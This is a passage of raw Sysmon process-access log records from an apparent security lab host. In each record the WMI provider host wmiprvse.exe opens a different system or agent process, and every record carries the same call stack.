Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026104Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026103Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026102Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026101Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026100Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026099Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026098Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026097Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026096Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026095Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026094Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026093Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026092Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026091Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026090Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026089Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026088Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026087Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026086Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026085Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 